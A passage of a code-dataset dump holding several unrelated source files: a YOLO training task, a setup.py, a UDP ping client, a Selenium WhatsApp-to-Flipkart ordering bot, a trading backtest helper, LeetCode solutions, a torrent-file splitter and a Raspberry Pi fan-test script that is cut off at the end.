aug_rand_hue=params.parser.aug_rand_hue,\n aug_rand_saturation=params.parser.aug_rand_saturation,\n aug_rand_brightness=params.parser.aug_rand_brightness,\n max_num_instances=params.parser.max_num_instances,\n 
scale_xy=model.detection_generator.scale_xy.get(),\n expanded_strides=model.detection_generator.path_scales.get(),\n darknet=model.darknet_based_model,\n best_match_only=params.parser.best_match_only,\n anchor_t=params.parser.anchor_thresh,\n random_pad=params.parser.random_pad,\n level_limits=level_limits,\n dtype=params.dtype,\n **base_config)\n\n # init the dataset reader\n reader = input_reader.InputReader(\n params,\n dataset_fn=dataset_fn.pick_dataset_fn(params.file_type),\n decoder_fn=decoder.decode,\n sample_fn=sample_fn.mosaic_fn(is_training=params.is_training),\n parser_fn=parser.parse_fn(params.is_training))\n dataset = reader.read(input_context=input_context)\n return dataset\n\n def build_metrics(self, training=True):\n \"\"\"Build detection metrics.\"\"\"\n metrics = []\n\n backbone = self.task_config.model.backbone.get()\n metric_names = collections.defaultdict(list)\n for key in range(backbone.min_level, backbone.max_level + 1):\n key = str(key)\n metric_names[key].append('loss')\n metric_names[key].append('avg_iou')\n metric_names[key].append('avg_obj')\n\n metric_names['net'].append('box')\n metric_names['net'].append('class')\n metric_names['net'].append('conf')\n\n for _, key in enumerate(metric_names.keys()):\n metrics.append(task_utils.ListMetrics(metric_names[key], name=key))\n\n self._metrics = metrics\n if not training:\n annotation_file = self.task_config.annotation_file\n if self._coco_91_to_80:\n annotation_file = None\n self.coco_metric = coco_evaluator.COCOEvaluator(\n annotation_file=annotation_file,\n include_mask=False,\n need_rescale_bboxes=False,\n per_category_metrics=self._task_config.per_category_metrics,\n max_num_eval_detections=self.task_config.max_num_eval_detections)\n\n return metrics\n\n def build_losses(self, outputs, labels, aux_losses=None):\n \"\"\"Build YOLO losses.\"\"\"\n return self._loss_fn(labels, outputs)\n\n def train_step(self, inputs, model, optimizer, metrics=None):\n \"\"\"Train Step.\n\n Forward step and backward propagation of the model.\n\n Args:\n inputs: a dictionary of input tensors.\n model: the model, forward pass definition.\n optimizer: the optimizer for this training step.\n metrics: a nested structure of metrics objects.\n\n Returns:\n A dictionary of logs.\n \"\"\"\n image, label = inputs\n\n with tf.GradientTape(persistent=False) as tape:\n # Compute a prediction\n y_pred = model(image, training=True)\n\n # Cast to float32 for gradient computation\n y_pred = tf.nest.map_structure(lambda x: tf.cast(x, tf.float32), y_pred)\n\n # Get the total loss\n (scaled_loss, metric_loss,\n loss_metrics) = self.build_losses(y_pred['raw_output'], label)\n\n # Scale the loss for numerical stability\n if isinstance(optimizer, tf.keras.mixed_precision.LossScaleOptimizer):\n scaled_loss = optimizer.get_scaled_loss(scaled_loss)\n\n # Compute the gradient\n train_vars = model.trainable_variables\n gradients = tape.gradient(scaled_loss, train_vars)\n\n # Get unscaled loss if we are using the loss scale optimizer on fp16\n if isinstance(optimizer, tf.keras.mixed_precision.LossScaleOptimizer):\n gradients = optimizer.get_unscaled_gradients(gradients)\n\n # Apply gradients to the model\n optimizer.apply_gradients(zip(gradients, train_vars))\n logs = {self.loss: metric_loss}\n\n # Compute all metrics\n if metrics:\n for m in metrics:\n m.update_state(loss_metrics[m.name])\n logs.update({m.name: m.result()})\n return logs\n\n def _reorg_boxes(self, boxes, info, num_detections):\n \"\"\"Scale and Clean boxes prior to Evaluation.\"\"\"\n mask = 
tf.sequence_mask(num_detections, maxlen=tf.shape(boxes)[1])\n mask = tf.cast(tf.expand_dims(mask, axis=-1), boxes.dtype)\n\n # Denormalize the boxes by the shape of the image\n inshape = tf.expand_dims(info[:, 1, :], axis=1)\n ogshape = tf.expand_dims(info[:, 0, :], axis=1)\n scale = tf.expand_dims(info[:, 2, :], axis=1)\n offset = tf.expand_dims(info[:, 3, :], axis=1)\n\n boxes = box_ops.denormalize_boxes(boxes, inshape)\n boxes = box_ops.clip_boxes(boxes, inshape)\n boxes += tf.tile(offset, [1, 1, 2])\n boxes /= tf.tile(scale, [1, 1, 2])\n boxes = box_ops.clip_boxes(boxes, ogshape)\n\n # Mask the boxes for usage\n boxes *= mask\n boxes += (mask - 1)\n return boxes\n\n def validation_step(self, inputs, model, metrics=None):\n \"\"\"Validation step.\n\n Args:\n inputs: a dictionary of input tensors.\n model: the keras.Model.\n metrics: a nested structure of metrics objects.\n\n Returns:\n A dictionary of logs.\n \"\"\"\n image, label = inputs\n\n # Step the model once\n y_pred = model(image, training=False)\n y_pred = tf.nest.map_structure(lambda x: tf.cast(x, tf.float32), y_pred)\n (_, metric_loss, loss_metrics) = self.build_losses(y_pred['raw_output'],\n label)\n logs = {self.loss: metric_loss}\n\n # Reorganize and rescale the boxes\n info = label['groundtruths']['image_info']\n boxes = self._reorg_boxes(y_pred['bbox'], info, y_pred['num_detections'])\n\n # Build the input for the COCO evaluation metric\n coco_model_outputs = {\n 'detection_boxes': boxes,\n 'detection_scores': y_pred['confidence'],\n 'detection_classes': y_pred['classes'],\n 'num_detections': y_pred['num_detections'],\n 'source_id': label['groundtruths']['source_id'],\n 'image_info': label['groundtruths']['image_info']\n }\n\n # Compute all metrics\n if metrics:\n logs.update(\n {self.coco_metric.name: (label['groundtruths'], coco_model_outputs)})\n for m in metrics:\n m.update_state(loss_metrics[m.name])\n logs.update({m.name: m.result()})\n return logs\n\n def aggregate_logs(self, state=None, step_outputs=None):\n \"\"\"Get Metric Results.\"\"\"\n if not state:\n self.coco_metric.reset_states()\n state = self.coco_metric\n self.coco_metric.update_state(step_outputs[self.coco_metric.name][0],\n step_outputs[self.coco_metric.name][1])\n return state\n\n def reduce_aggregated_logs(self, aggregated_logs, global_step=None):\n \"\"\"Reduce logs and remove unneeded items. 
Update with COCO results.\"\"\"\n res = self.coco_metric.result()\n return res\n\n def initialize(self, model: tf.keras.Model):\n \"\"\"Loading pretrained checkpoint.\"\"\"\n\n if not self.task_config.init_checkpoint:\n logging.info('Training from Scratch.')\n return\n\n ckpt_dir_or_file = self.task_config.init_checkpoint\n if tf.io.gfile.isdir(ckpt_dir_or_file):\n ckpt_dir_or_file = tf.train.latest_checkpoint(ckpt_dir_or_file)\n\n # Restoring checkpoint.\n if self.task_config.init_checkpoint_modules == 'all':\n ckpt = tf.train.Checkpoint(**model.checkpoint_items)\n status = ckpt.read(ckpt_dir_or_file)\n status.expect_partial().assert_existing_objects_matched()\n else:\n ckpt_items = {}\n if 'backbone' in self.task_config.init_checkpoint_modules:\n ckpt_items.update(backbone=model.backbone)\n if 'decoder' in self.task_config.init_checkpoint_modules:\n ckpt_items.update(decoder=model.decoder)\n\n ckpt = tf.train.Checkpoint(**ckpt_items)\n status = ckpt.read(ckpt_dir_or_file)\n status.expect_partial().assert_existing_objects_matched()\n\n logging.info('Finished loading pretrained checkpoint from %s',\n ckpt_dir_or_file)\n\n def create_optimizer(self,\n optimizer_config: OptimizationConfig,\n runtime_config: Optional[RuntimeConfig] = None):\n \"\"\"Creates a TF optimizer from configurations.\n\n Args:\n optimizer_config: the parameters of the Optimization settings.\n runtime_config: the parameters of the runtime.\n\n Returns:\n A tf.optimizers.Optimizer object.\n \"\"\"\n opt_factory = optimization.YoloOptimizerFactory(optimizer_config)\n # pylint: disable=protected-access\n ema = opt_factory._use_ema\n opt_factory._use_ema = False\n\n opt_type = opt_factory._optimizer_type\n if opt_type == 'sgd_torch':\n optimizer = opt_factory.build_optimizer(opt_factory.build_learning_rate())\n optimizer.set_bias_lr(\n opt_factory.get_bias_lr_schedule(self._task_config.smart_bias_lr))\n optimizer.search_and_set_variable_groups(self._model.trainable_variables)\n else:\n optimizer = opt_factory.build_optimizer(opt_factory.build_learning_rate())\n opt_factory._use_ema = ema\n\n if ema:\n logging.info('EMA is enabled.')\n optimizer = opt_factory.add_ema(optimizer)\n\n # pylint: enable=protected-access\n\n if runtime_config and runtime_config.loss_scale:\n use_float16 = runtime_config.mixed_precision_dtype == 'float16'\n optimizer = performance.configure_optimizer(\n optimizer,\n use_float16=use_float16,\n loss_scale=runtime_config.loss_scale)\n\n return optimizer\n","sub_path":"official/projects/yolo/tasks/yolo.py","file_name":"yolo.py","file_ext":"py","file_size_in_byte":16647,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"422156811","text":"from setuptools import setup, find_packages\nfrom os import path\n\nhere = path.abspath(path.dirname(__file__))\n\nrequires = [\n 'sqlalchemy',\n 'flask-sqlalchemy',\n 'flask-migrate',\n 'alembic',\n 'flask',\n 'pysqlite'\n]\n\n\nsetup(\n name='outpost',\n version='0.0.1',\n description='outpost',\n long_description='Ansible control server',\n packages=find_packages(exclude=['contrib', 'docs', 'tests']),\n install_requires=requires,\n tests_require=requires,\n entry_points={\n 'console_scripts': [\n 'outpost = outpost.server.server:main'\n ]\n }\n)\n","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":598,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"197498218","text":"import socket\nimport time\nimport sys\n\nif 
len(sys.argv) > 2:\n total_pings_toSend = int(sys.argv[2])\nelse:\n total_pings_toSend = 4\n\naddress = sys.argv[1]\nport = 2000\npong_server_address = (address, port)\nping_socket = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)\n\nrrt_counter = 0\ntimeouts_counter = 0\npings_counter = 0\ntotal_pings_sent = 0\n\nwhile total_pings_sent < total_pings_toSend:\n if pings_counter == 1000:\n pings_counter = 0\n\n ping_socket.settimeout(5.0)\n ping_message = \"PING-\" + str(pings_counter)\n ping_socket.sendto(ping_message.encode(), pong_server_address) # encode to bytes for Python 3 sockets\n ping_sent_at = time.time()\n\n try:\n pong_message, pong_server_address = ping_socket.recvfrom(1024)\n pong_received_at = time.time()\n round_trip_time = (pong_received_at - ping_sent_at)\n round_trip_time = int(round(round_trip_time * 1000))\n print(str(pings_counter) + \": \" + str(round_trip_time) + \"ms\")\n rrt_counter += round_trip_time\n except socket.timeout:\n print(str(pings_counter) + \": \" + 'timeout')\n timeouts_counter += 1\n pings_counter += 1\n total_pings_sent += 1\n time.sleep(0.1)\n\nprint(\"AVG=\" + str(rrt_counter / total_pings_sent) + \" TIMEOUTS=\" + str(timeouts_counter))\n","sub_path":"Assignment4_UDP_PingPong/cli.py","file_name":"cli.py","file_ext":"py","file_size_in_byte":1240,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"578340897","text":"from selenium import webdriver\nfrom selenium.webdriver.common.keys import Keys\nimport time\n\nno_products = []\nl1 = []\n\n#takes input of the flipkart id and password\nemail1 = input(\"Enter your Flipkart Email ID: \")\npassword1 = input(\"Enter your Flipkart Password: \")\n\n#list of daily needed products\ndaily_products = [\"Surf Excel Matic Detergent Powder Top load ( 2 kg ) 2 kg Washing Powder\",\"xiaomi mi 4\",\"Pears Pure & Gentle Bathing Bar (375 g, Pack of 3)\",\"Dove Daily Shine Shampoo (650 ml)\",\"Joy Honey & Almonds Advanced Nourishing Body Lotion(Pack of 2 x 300 ml) (600 ml)\",\"Vim Dish Cleaning Gel (Lemon)\"]\n\n\nbrowser1 = webdriver.Chrome(executable_path = r\"./chromedriver\")\nbrowser1.get(\"https://web.whatsapp.com/\") #Opens Whatsapp Web\ntime.sleep(12)\n\n#Searches a group named Flipkart in whatsapp web\nbrowser1.find_element_by_xpath(\"//*[@id='side']/div[1]/div/label/input\").click()\ngroup = browser1.find_element_by_css_selector(\"input.jN-F5.copyable-text.selectable-text\")\ngroup.send_keys(\"Flipkart\")\ntime.sleep(5)\n\n#opens the flipkart whatsapp group\nbrowser1.find_element_by_class_name('dIyEr').click()\ntime.sleep(2)\n\n#displays the list of daily products to the rest of the group members\n#the serial numbers of the products correspond to the number by which the members can order stuff\nfgroup5 = browser1.find_element_by_css_selector(\"div._2S1VP.copyable-text.selectable-text\")\nfor i in range(len(daily_products)):\n fgroup5.send_keys(str(i) + \") \" + daily_products[i])\n fgroup5.send_keys(Keys.ENTER)\n time.sleep(2)\n\n#this displays that portal is open to take orders\nfgroup4 = browser1.find_element_by_css_selector(\"div._2S1VP.copyable-text.selectable-text\")\nfgroup4.send_keys(\"OPEN\")\nfgroup4.send_keys(Keys.ENTER)\n\n\n#this list contains the text on the page\np = browser1.find_elements_by_css_selector(\"span.selectable-text.invisible-space.copyable-text\")\n\ntime.sleep(2)\nproduct = p[-1].text\n\n#this loop is basically to check the OPEN text\nwhile(product == \"OPEN\"):\n p = browser1.find_elements_by_css_selector(\"span.selectable-text.invisible-space.copyable-text\")\n 
time.sleep(2)\n product = p[-1].text\n\n\n#main loop\nwhile(product != \"OPEN\"):\n no_products = []\n #this displays that your order is in process\n fgroup1 = browser1.find_element_by_css_selector(\"div._2S1VP.copyable-text.selectable-text\")\n fgroup1.send_keys(\"ORDER IN PROCESS\")\n time.sleep(2)\n fgroup1.send_keys(Keys.ENTER)\n time.sleep(2)\n\n #opens flipkart\n browser = webdriver.Chrome(executable_path = r\"./chromedriver\")\n browser.get(\"https://www.flipkart.com/\")\n time.sleep(2)\n \n #enters email id\n email = browser.find_element_by_css_selector(\"input._2zrpKA\")\n email.send_keys(email1)\n\n \n time.sleep(2)\n\n #enters password\n try:\n browser.find_element_by_xpath(\"/html/body/div[2]/div/div/div/div/div[2]/div/form/div[2]/input\").click()\n password = browser.find_element_by_css_selector(\"input._2zrpKA._3v41xv\")\n password.send_keys(password1)\n time.sleep(2)\n\n except:\n\n browser.find_element_by_xpath(\"/html/body/div[2]/div/div/div/div/div[2]/div/form/div[2]/button\").click()\n password2 = browser.find_element_by_css_selector(\"input._2zrpKA._3v41xv\")\n password2.send_keys(password1)\n time.sleep(2)\n \n browser.find_element_by_xpath(\"/html/body/div[2]/div/div/div/div/div[2]/div/form/div[3]/button\").click()\n\n time.sleep(2)\n #for searching in the search bar\n browser.find_element_by_xpath(\"//*[@id='container']/div/header/div[1]/div/div[2]/form/div/div[1]/div/input\")\n\n time.sleep(2)\n\n i = 0\n j = 0\n #loop for multiple item orders\n while(product[i] != 'S'):\n item = browser.find_element_by_css_selector(\"input.LM6RPg\")\n item.send_keys(daily_products[int(product[i])])\n item.send_keys(Keys.ENTER)\n time.sleep(8)\n browser.find_element_by_xpath(\"//*[@id='container']/div/div[1]/div[2]/div/div[1]/div[2]/div[2]/div/div[1]/div/a[2]\").click()\n time.sleep(8)\n #this is basically changing the browser window \n l = (browser.window_handles)\n browser.switch_to_window(l[j+1])\n time.sleep(5)\n try:\n browser.find_element_by_xpath(\"//*[@id='container']/div/div[1]/div[2]/div/div[1]/div[1]/div[2]/div/ul/li[1]/button\").click()\n except:\n no_products.append(int(product[i]))\n\n i+=2\n j+=1\n time.sleep(5)\n browser.find_element_by_xpath(\"//*[@id='container']/div/div[1]/div/div[1]/div/div[3]/form/button\").click()\n\n time.sleep(3)\n\n browser1.find_element_by_xpath(\"//*[@id='main']/footer/div[1]/div[2]/div/div[2]\").click()\n time.sleep(2)\n\n fgroup3 = browser1.find_element_by_css_selector(\"div._2S1VP.copyable-text.selectable-text\")\n \n #this will display products that are not available \n if(len(no_products) > 0):\n for i in range(len(no_products)):\n fgroup3.send_keys(\"Product with code \" + str(no_products[i]) + \" is not available\")\n fgroup3.send_keys(Keys.ENTER)\n\n\n #this will send the link of the checkout in the whatsapp group to the user\n fgroup = browser1.find_element_by_css_selector(\"div._2S1VP.copyable-text.selectable-text\")\n fgroup.send_keys(browser.current_url)\n time.sleep(2)\n fgroup.send_keys(Keys.ENTER)\n \n #quits the flipkart browser\n browser.quit()\n\n\n\n \n fgroup2 = browser1.find_element_by_css_selector(\"div._2S1VP.copyable-text.selectable-text\")\n fgroup2.send_keys(\"Please proceed for checkout by clicking the above link.\")\n time.sleep(2)\n fgroup2.send_keys(Keys.ENTER)\n fgroup2.send_keys(\"OPEN\")\n fgroup2.send_keys(Keys.ENTER)\n time.sleep(2)\n\n\n p = browser1.find_elements_by_css_selector(\"span.selectable-text.invisible-space.copyable-text\")\n time.sleep(2)\n product = p[-1].text\n\n time.sleep(2)\n \n 
#checks for more orders\n while(product == \"OPEN\"):\n p = browser1.find_elements_by_css_selector(\"span.selectable-text.invisible-space.copyable-text\")\n time.sleep(2)\n product = p[-1].text\n\n","sub_path":"zense_project.py","file_name":"zense_project.py","file_ext":"py","file_size_in_byte":6091,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"109926374","text":"import math\nimport numpy as np\nfrom trader import StockTrader\nimport matplotlib.pyplot as plt\nfrom agents.UCRP import UCRP\nfrom agents.Loser import Loser\nfrom agents.Winner import Winner\nimport logging\nlogger = logging.getLogger()\n\n\ndef parse_info(info):\n return info['reward'], info['continue'], info['next state'], info['weight vector'], info['price'], info['risk']\n\n\ndef traversal(stocktrader, agent, env, epoch, noise_flag, framework, method, trainable):\n info = env.step(None, None, noise_flag)\n r, done, state, w1, p, risk = parse_info(info)\n done = 1\n t = 0\n\n while done:\n w2 = agent.predict(state, w1)\n env_info = env.step(w1, w2, noise_flag)\n r, done, s_next, w1, p, risk = parse_info(env_info)\n if framework == 'PG':\n agent.save_transition(state, p, w2, w1)\n else:\n agent.save_transition(state, w2, r-risk, done, s_next, w1)\n loss, q_value, actor_loss = 0, 0, 0\n\n if framework == 'DDPG':\n if not done and trainable:\n agent_info = agent.train(method, epoch)\n loss, q_value = agent_info[\"critic_loss\"], agent_info[\"q_value\"]\n if method == 'model_based':\n actor_loss = agent_info[\"actor_loss\"]\n\n elif framework == 'PPO':\n if not done and trainable:\n agent_info = agent.train(method, epoch)\n loss, q_value = agent_info[\"critic_loss\"], agent_info[\"q_value\"]\n if method == 'model_based':\n actor_loss = agent_info[\"actor_loss\"]\n\n elif framework == 'PG':\n if not done and trainable:\n agent.train()\n\n stocktrader.update_summary(loss, r, q_value, actor_loss, w2, p)\n t = t + 1\n\n\ndef backtest(agent, env, path, framework):\n logger.debug(\"Backtest\")\n\n agents = []\n agents.extend(agent)\n agents.append(UCRP())\n agents.append(Loser())\n agents.append(Winner())\n labels = [framework, 'UCRP', \"Loser\", \"Winner\"]\n\n wealths_result = []\n rs_result = []\n for i, agent in enumerate(agents):\n stocktrader = StockTrader()\n info = env.step(None, None, False)\n r, done, s, w1, p, risk = parse_info(info)\n done = 1\n wealth = 10000000\n wealths = [wealth]\n rs = [1]\n while done:\n w2 = agent.predict(s, w1)\n env_info = env.step(w1, w2, False)\n r, done, s_next, w1, p, risk = parse_info(env_info)\n wealth = wealth * math.exp(r)\n rs.append(math.exp(r)-1)\n wealths.append(wealth)\n s = s_next\n stocktrader.update_summary(0, r, 0, 0, w2, p)\n\n stocktrader.write(map(lambda x: str(x), env.get_codes()), labels[i])\n logger.debug('Finished agent {}'.format(i))\n wealths_result.append(wealths)\n rs_result.append(rs)\n\n logger.info('Asset name \\t Avg daily return \\t Sharpe ratio \\t Max drawdown')\n plt.figure(figsize=(8, 6), dpi=100)\n for i in range(len(agents)):\n plt.plot(wealths_result[i], label=labels[i])\n mrr = float(np.mean(rs_result[i])*100)\n sharpe = float(np.mean(rs_result[i])/np.std(rs_result[i])*np.sqrt(252))\n maxdrawdown = float(max(1 - min(wealths_result[i]) / np.maximum.accumulate(wealths_result[i])))\n logger.info(\"%s \\t %s \\t %s \\t %s\", labels[i], round(mrr, 3), round(sharpe, 3), round(maxdrawdown, 3))\n plt.legend()\n plt.savefig(path + 'backtest.png')\n #plt.show()\n\n\ndef parse_config(config, mode):\n num_codes = config[\"num_codes\"]\n 
start_date = config[\"start_date\"]\n end_date = config[\"end_date\"]\n features = config[\"features\"]\n agent_config = config[\"agents\"]\n market = config[\"mark_types\"]\n noise_flag, record_flag, plot_flag = config[\"noise_flag\"], config[\"record_flag\"], config[\"plot_flag\"]\n predictor, framework, window_length = agent_config\n reload_flag, trainable = config['reload_flag'], config['trainable']\n method = config['method']\n epochs = config['epochs']\n if mode == 'test':\n record_flag = True\n noise_flag = False\n plot_flag = True\n reload_flag = True\n trainable = False\n method = 'model_free'\n\n logger.info(\"Status:\")\n logger.info(\"Date: %s - %s\", start_date, end_date)\n logger.info('Features: %s', features)\n logger.info(\"Predictor: %s, Framework %s, Window Length: %s\", predictor, framework, window_length)\n logger.info(\"Epochs: %d\", epochs)\n logger.info(\"Trainable: %d\", trainable)\n logger.info(\"Reloaded Model: %d\", reload_flag)\n logger.info(\"Method: %s\", method)\n logger.info(\"Noise_flag: %d\", noise_flag)\n logger.info(\"Record_flag: %d\", record_flag)\n logger.info(\"Plot_flag %d: \", plot_flag)\n\n return num_codes, start_date, end_date, features, agent_config, market, predictor, framework, window_length, \\\n noise_flag, record_flag, plot_flag, reload_flag, trainable, method, epochs\n","sub_path":"utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":4967,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"539926261","text":"class Solution:\n def minMoves(self, nums: List[int], limit: int) -> int:\n res, curr=float('inf'), 0\n d=collections.defaultdict(int)\n n=len(nums)\n for i in range(n//2):\n a, b=nums[i], nums[n-i-1]\n d[2]+=2\n d[min(a, b)+1]-=1\n d[a+b]-=1\n d[a+b+1]+=1\n d[max(a,b)+limit+1]+=1\n \n for i in range(2, 2*limit+1):\n curr+=d[i]\n res=min(res, curr)\n return res\n \n","sub_path":"python/minimum-moves-to-make-array-complementary.py","file_name":"minimum-moves-to-make-array-complementary.py","file_ext":"py","file_size_in_byte":501,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"420096823","text":"import os\nimport os.path\nimport shutil\n\nbase_dir = r'/root/torrent/'\nlocal_dir = \"D:\\\\mac_torrent\\\\\"\n\n\ndef create_abs_path(dir):\n for root, dirs, files in os.walk(dir):\n for name in files:\n filename =base_dir + dir.split('\\\\')[-2] + r'/' + name\n with open(dir+\"files.txt\",\"a+\") as f:\n f.write(filename+'\\n')\n\n\ndef main():\n count = 0\n current_split_dir = 1\n for root, dirs, files in os.walk(local_dir):\n for name in files:\n complete_dir = local_dir + str(current_split_dir) + '\\\\'\n if not os.path.exists(complete_dir):\n os.mkdir(complete_dir)\n count += 1\n shutil.move(local_dir+name,complete_dir)\n if count % 400 == 0:\n create_abs_path(complete_dir)\n current_split_dir += 1\n\n\n\nif __name__ == '__main__':\n main()","sub_path":"torrent_tools/split_torrent_forder.py","file_name":"split_torrent_forder.py","file_ext":"py","file_size_in_byte":876,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"192008563","text":"import pandas as pd\r\nimport re\r\n\r\n\r\ndef check_entity_data(q, e):\r\n number_of_error = 0\r\n for i, data in enumerate(zip(q, e)):\r\n\r\n s = str(data[0]).split(' ')\r\n e = str(data[1]).split(' ')\r\n\r\n if len(s) != len(e):\r\n print(i, s, e)\r\n number_of_error += 1\r\n\r\n return number_of_error\r\n\r\n\r\ndef 
convert():\r\n f = pd.read_csv('data/convert/testfile.csv', delimiter=',', encoding='utf-8')\r\n question = [re.sub('\\t', '', s) for s in f['question'].tolist()]\r\n entity = []\r\n for i, e in enumerate(f['entity'].tolist()):\r\n while '\\t\\t' in e:\r\n e = re.sub('\\t\\t', '\\t', str(e))\r\n print(i)\r\n\r\n if e[len(e) - 1] == '\\t':\r\n e = e[0:len(e) - 1]\r\n\r\n e = re.sub('\\t', ' ', e)\r\n entity.append(e)\r\n\r\n if check_entity_data(question, entity) != 0:\r\n raise Exception(\"number of tokens and entities must be the same!\")\r\n\r\n f = pd.DataFrame(data=zip(question, entity))\r\n f.to_csv('data/convert/testfile_convert.csv', index=False)\r\n\r\n\r\nif __name__ == '__main__':\r\n convert()\r\n","sub_path":"data/convert/test_convert.py","file_name":"test_convert.py","file_ext":"py","file_size_in_byte":1086,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"314448846","text":"\"\"\"\nProblem: https://leetcode-cn.com/problems/find-minimum-in-rotated-sorted-array-ii/\n\"\"\"\nfrom typing import List\n\nclass Solution:\n # linear scan\n def findMin(self,nums:List[int])->int:\n if not nums:\n return\n\n res = nums[0]\n for i in range(1,len(nums)):\n if nums[i]>=nums[i-1]:\n continue\n else:\n res = nums[i]\n return res\n\n # binary search\n def findMinByPivot(self,nums:List[int])->int:\n if not nums:\n return\n\n low,high = 0,len(nums)-1\n while low < high:\n pivot = (low + high) // 2\n if nums[pivot] > nums[high]:\n low = pivot + 1\n else :\n high -= 1\n return nums[low]\n\nnums = [3,4,4,5,1,1,2]\n# nums = [2,2,2,0,1]\n# nums = [1,1,0,0,1,1]\nsolution = Solution()\nprint(solution.findMin(nums))\nprint(solution.findMinByPivot(nums))","sub_path":"LC/lc154_寻找旋转排序数组中的最小值II[非严格有序]_20210409.py","file_name":"lc154_寻找旋转排序数组中的最小值II[非严格有序]_20210409.py","file_ext":"py","file_size_in_byte":1062,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"204354824","text":"valores = []\n\nfor v in range(0,5):\n valores.append(int(input('Enter a number: ')))\n\nfor p, n in enumerate(valores):\n if n == max(valores):\n print(f'The largest number is {n} at position {p}...',end='')\n elif n == min(valores):\n print(f'The smallest number is {n} at position {p}...',end='')\n","sub_path":"Exercicios_Python/exercicio78.py","file_name":"exercicio78.py","file_ext":"py","file_size_in_byte":310,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"482678990","text":"import time\nimport pigpio\nimport sys\n\nFILE_OUTPUT_NAME = ''\n\nclass reader:\n\n def __init__(self, pi, gpio, pwm, pulses_per_rev = 1.0, weighting = 0.0, min_RPM = 5.0):\n\n self.pi = pi\n self.gpio = gpio\n self.pwm = pwm\n self.pulses_per_rev = pulses_per_rev\n self.rpm_data = []\n\n if min_RPM > 1000.0:\n min_RPM = 1000.0\n elif min_RPM < 1.0:\n min_RPM = 1.0\n\n self.min_RPM = min_RPM\n self._watchdog = 200 # milliseconds\n\n if weighting < 0.0:\n weighting = 0.0\n elif weighting > 0.99:\n weighting = 0.99\n\n self._new = 1.0 - weighting\n self._old = weighting\n\n self._high_tick = None\n self._period = None\n\n pi.set_mode(gpio, pigpio.INPUT)\n\n self._cb = pi.callback(gpio, pigpio.RISING_EDGE, self._cbf)\n pi.set_watchdog(gpio, self._watchdog)\n\n def _cbf(self, gpio, level, tick):\n if level == 1:\n\n if self._high_tick is not None:\n t = pigpio.tickDiff(self._high_tick, tick)\n\n if self._period is not None:\n self._period = (self._old * self._period) + (self._new * t)\n\n else:\n self._period = t\n\n self._high_tick = tick\n\n elif level == 2:\n\n if self._period is not 
None:\n if self._period < 2000000000:\n self._period += (self._watchdog * 1000)\n \n def PWM(self, duty):\n self.pi.hardware_PWM(self.pwm, 25000, duty * 10000)\n \n def RPM(self):\n\n RPM = 0.0\n if self._period is not None:\n RPM = 60000000.0 / (self._period * self.pulses_per_rev)\n if RPM < self.min_RPM:\n RPM = 0.0\n return RPM\n\n def calc_rpm(self):\n temp_sum = 0\n if(len(self.rpm_data) ==0):\n return 0\n else:\n for i in range(0, len(self.rpm_data)):\n temp_sum += self.rpm_data[i]\n return ((temp_sum/2)/(len(self.rpm_data) - 1))\n\n\n\n def cancel(self):\n self.pi.hardware_PWM(self.pwm, 25000, 0)\n self.pi.set_watchdog(self.gpio, 0)\n self._cb.cancel()\n\ndef message_display(msg, desired_answer):\n while(1):\n if input(msg).lower() == desired_answer:\n return 1\n else:\n print('\\033c')\n print(\"*****************************\")\n print(\"Incorrect character entered.\")\n print(\"*****************************\")\n return 0\n\ndef main(mode, RUN_TIME, DUTY):\n\n RPM_GPIO = 4\n PWM_GPIO = 19\n\n SAMPLE_TIME = 5\n\n print('\\033c')\n print(f\"\\nTESTING MODE {mode + 1}...\\n\")\n\n pi = pigpio.pi()\n\n p = fan_main.reader(pi, RPM_GPIO, PWM_GPIO)\n \n p.PWM(DUTY)\n\n start = time.time()\n\n while (time.time() - start) < RUN_TIME:\n try:\n \n time.sleep(SAMPLE_TIME)\n\n RPM = p.RPM()\n if((time.time() - start) > 30):\n p.rpm_data.append(RPM)\n\n print('\\033c')\n print(\"Time: {} \".format(round(time.time() - start, 1)) + \"RPM = {}\".format(int(RPM+0.5)/2) + \" (Press CTRL + C to STOP)\")\n \n except KeyboardInterrupt:\n print(\"*****************************\")\n print(\"\\nTest Cancelled\\n\")\n print(\"*****************************\")\n p.cancel()\n rpm_avg = p.calc_rpm()\n print(f\"Average RPM of Test: {rpm_avg}\")\n return 0\n \n finally:\n pass\n\n p.cancel()\n rpm_avg = p.calc_rpm()\n\n return rpm_avg\n\ndef user_input(message, limit):\n mode_max = input(message)\n if (mode_max.isnumeric()) and (int(mode_max) < limit):\n return int(mode_max)\n else:\n return 0\n\ndef display_results(RPM_AVG, settings):\n print(\"\\nTEST RESULTS:\\n\")\n for i in range(0, len(settings[0])):\n print(f\"Mode = {i+1}, Duration = {settings[0][i]}, PWM = {settings[1][i]} %, Avg RPM = {round(RPM_AVG[i], 1)}\")\n\ndef start_sequence():\n settings = [[],[]]\n\n print('\\033c')\n print(\"*****************************\")\n print(\"\\nNURO FAN TESTING\\n\")\n print(\"To stop the test at anytime, hold 'CTRL + C'\\n\")\n print(\"*****************************\\n\")\n\n mode_max = user_input(\"Enter number of settings (max 10):\", 10)\n\n for i in range(0, mode_max):\n settings[0].append(user_input(f\"Enter mode {i + 1} duration (mins):\", 60000)) # max 1000 hours\n settings[1].append(user_input(f\"Enter mode {i + 1} PWM %:\", 96)) # max duty cycle 96%\n\n return settings\n\n\nif __name__ == \"__main__\":\n \n import time\n import pigpio\n import fan_main\n # datetime, os and csv are used below but were missing from the imports\n import 